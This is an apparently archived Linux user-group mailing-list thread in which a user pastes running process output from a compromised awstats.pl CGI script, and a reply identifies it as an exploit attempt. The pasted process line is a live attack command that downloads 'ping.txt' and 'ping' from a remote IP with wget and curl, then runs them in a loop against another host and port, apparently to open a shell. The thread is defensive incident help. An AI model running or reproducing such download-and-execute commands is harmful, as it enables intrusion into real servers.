Hello Kelsey,
awstats has a good history of exploits against it, and it appears to be
commonly exploited in redhat systems. Unless that's you downloading
"ping.txt" or "ping" --which is apparently a perl exploit that most
likely takes an IP addresss and port for it's two arguments-- those logs
(or at least, set of commands) look like exploit attempts.
-Paul Patrick C. Prantilla
Kelsey Hartigan Go wrote:
Any vulnerability in awstats.pl?
I suddenly have these processes running...
6086 ? S 0:00 /usr/bin/perl /var/www/cgi-bin/awstats.pl
6087 ? R 81:06 sh -c echo ;echo b_exp;wget
http://219.84.105.36/ping
.txt;mv ping.txt temp2006;perl temp2006 220.227.100.4 3303;wget
http://219.84.10
5.36/ping;chmod +x ping;./ping 220.227.100.4 3303;curl -o ping
http://219.84.105
.36/ping;chmod +x ping;./ping 220.227.100.4 3303;cd /tmp/;curl -o temp2006
http:
//219.84.105.36/ping.txt;while [ 1 ];do perl temp2006
220.227.100.43303;done;wg
et http://219.84.105.36/ping;chmod +x ping;./ping 220.227.100.4
3303;curl -o
pin
g http://219.84.105.36/ping;chmod +x ping;./ping 220.227.100.4 3303;echo
e_exp;%
00/awstats.w.x.y.z.conf
where w.x.y.z is my public ip...
anybody know what this is that what's it's trying to do...
------------------------------------------------------------------------
_________________________________________________
Philippine Linux Users' Group (PLUG) Mailing List
[email protected] (#PLUG @ irc.free.net.ph)
Read the Guidelines: http://linux.org.ph/lists
Searchable Archives: http://archives.free.net.ph
_________________________________________________
Philippine Linux Users' Group (PLUG) Mailing List
[email protected] (#PLUG @ irc.free.net.ph)
Read the Guidelines: http://linux.org.ph/lists
Searchable Archives: http://archives.free.net.ph
